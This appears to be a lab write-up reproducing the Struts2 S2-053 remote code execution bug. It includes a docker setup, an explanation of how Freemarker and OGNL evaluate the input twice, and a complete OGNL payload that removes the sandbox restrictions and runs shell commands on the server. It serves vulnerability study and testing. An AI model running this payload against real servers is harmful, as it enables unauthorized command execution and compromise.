S2-053 Remote Code Execution Vulnerability

Chinese version

Affected Version: Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10

Details:

Setup

docker-compose up -d

After the environment has started, visiting http://your-ip:8080/hello.action shows a page with a form you can submit.

Exploit

Struts2 evaluates OGNL expressions in the attributes of its Freemarker tags. When a tag attribute is built from request data (for example by interpolating a request parameter with ${...} inside the attribute value), the user-supplied string is not handed to OGNL directly: Freemarker first renders it into the template, and the resulting attribute value is then evaluated a second time, by OGNL. A parameter value of the form %{...} therefore reaches the OGNL evaluator as an expression rather than as a string literal, which yields remote code execution.

Payload:

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

PS: Some people said that they could not reproduce the vulnerability. After my own test, I found that the line break at the end of the above payload cannot be dropped (that is, the payload must be followed by a newline).

Copied From: vulhub/struts2/s2-053